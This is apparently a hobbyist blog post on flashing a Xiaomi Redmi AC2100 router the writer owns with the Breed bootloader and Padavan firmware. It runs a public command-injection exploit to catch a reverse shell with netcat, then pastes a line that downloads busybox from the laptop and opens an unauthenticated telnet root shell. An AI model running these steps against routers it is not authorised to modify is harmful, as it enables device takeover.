Redmi AC2100 router flashed with third-party firmware

This post details the steps I went through to flash Xiaomi’s Redmi AC2100 router using  a third-party firmware. There are already excellent guides out there so I won’t try to reinvent the wheel.  Instead I will focus on the differences for my circumstances where necessary. I will also list the resources that I have followed closely at the end of the post.

Although the AC2100 is neither a high end (Xiaomi has been releasing budget-friendly WiFi-6 routers since the end of 2019) nor new product, what got me initially interested in this particular wireless router was the relative ease with which people are able to flash to third-party firmwares. Contrary to some negative online reviews regarding Xiaomi’s wireless routers, I have not had any issues in using Xiaomi’s firmware in the past. My two main reasons for changing the firmware are

  1. Increase the WiFi transmit power by enabling region setting, because Xiaomi’s firmware for China-only products does not have a region setting (e.g. selecting USA instead of China).
  2. Enabling 160MHz for 5GHz WiFi, which is disabled by default in the stock firmware.

Firstly here are my environments.

  • Macbook Pro: macOS 10.14.6
  • System Python version: 2.7.16
  • Homebrew installed https://brew.sh/
  • Redmi AC2100 factory version: 1.0.14

Preparations

Software for Macbook

The needed tools are Python 3, scapy (Python library), netcat and telnet. As macOS comes with Python 2.x by default, I highly recommend installing Python 3 using pyenv from homebrew and not mess with any system files. Here is the  recommendation on how to manage multiple Python versions https://opensource.com/article/19/5/python-3-default-mac. Netcat and telnet can also be installed using homebrew.

Python 2 won’t work!

$brew install pyenv
# to install Python 3.7.8
$ pyenv install 3.7.8
# set Python 3.7.8 as global version
$ pyenv global 3.7.8
# install scapy
$ pip install scapy

Binaries/scripts to download

  • Simulate PPPoE service: PPPoE_Simulator.py. I have tried both [1] and [2] and there didn’t seem to be any differences, ended up using the file from [1]. Th interface needs to be changed accordingly to your network device, which you can find out using ifconfig after changing the default IP address.
  • The exploit to enable reverse shell: cve.py. I used the file from [1]. The interface needs to be changed accordingly to your network device
  • Simple shell to install on router: busybox. I used the file from [2] but the version from [1] probably will work too.
  • Bootloader to replace Xiaomi’s, for easy switching of firmware: breed-mt7621-xiaomi-r3g.bin from https://breed.hackpascal.net/ (AC2100 uses MTK 7621). Here is an explanation of Breed in English https://ltehacks.com/viewtopic.php?f=21&t=779
  • Padavan firmware to be loaded from inside Breed, RM2100.trx from https://github.com/hanwckf/rt-n56u (This is based on Asus firmware AFAIK).

Connect router to PC

  1. Connect Macbook to the router in a particular configuration – need 2 ethernet cables, see either [1] or [2].
  2. Disable WiFi.
  3. Set Macbook’s IP manually to 192.168.31.177, Net mask 255.255.255.0, Gateway 192.168.31.1. Check the network interface with this IP address – this will be the interface to set to in the two Python scripts.
  4. Some guides have mentioned needing to reset the router. My experience is that it is unnecessary at this stage.

Flashing firmware

  • Open a terminal session. Start PPPoE service locally.
$ sudo python PPPoE_Simulator.py

Go into AC2100’s settings at http://192.168.31.1 and change the connection method to PPPoE, using username and password as 123 (actually any random strings will do). There should be connection messages appearing very shortly.

  • Open another terminal session and start a local http server in the same folder where busybox and Breed. were downloaded to This is to allow transfer of files to the router later.
$ python -m http.server 8081
  • Open a third terminal session. Start netcat service to listen to port 31337
$ netcat -nvlp 31337
  • Open one more terminal session to run the exploit.
$ sudo python cve.py

Once the message “Sent 1 packets” appears here, check to see if the netcat session window indicates a connection from 192.168.31.1. If nothing appears, your router may have a different MAC address to the one specified in the script. Check the following line in cve.py because I spent a good three hours pulling my hair out just because I missed this small step!

# cve.py
if src.startswith("change to your router mac")

Because the connection can be unstable, which means the netcat and cve.py may need to be rerun multiple times, I suggest copying the following line to be ready to paste into the netcat session as soon as the “connection…” message appears. If everything proceeds correctly you will see busybox being uploaded and permissions set.

cd /tmp && wget http://192.168.31.177:8081/busybox && chmod a+x ./busybox &&./busybox telnetd -l /bin/sh
  • Open another terminal session, and telnet into the router at 192.168.31.1 from the folder where Breed has been downloaded to.
$ telnet 192.168.31.1
# the following to execute on router
cd /tmp
wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin && nvram set uart_en=1 && nvram set bootdelay=5 && nvram set flag_try_sys1_failed=1 && nvram commit
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader

The last line replaces Xiaomi’s bootloader with Breed. The router should now reboot.

  • Login to http://192.168.31.1 to check if the router is working normally.
  • Reset the router. This will set the router to boot into Breed.
  • Change network interface on Macbook to obtain IP via DHCP.
  • Log in to http://192.168.1.1 and select firmware update (固件更新) and proceed to flash Padavan.
  • Log in to Padavan at http://192.168.2.1 using admin/admin.

Resources

  1. Instructions from Openwrt official site https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
  1. Here is another good set of instructions to install Openwrt with many screenshots https://github.com/impulse/ac2100-openwrt-guide
  1. Instructions from the well-known Chinese forum for software-based router to install Breed https://www.right.com.cn/forum/thread-4008447-1-1.html

2 Replies to “Redmi AC2100 router flashed with third-party firmware”

Leave a Reply

Your email address will not be published. Required fields are marked *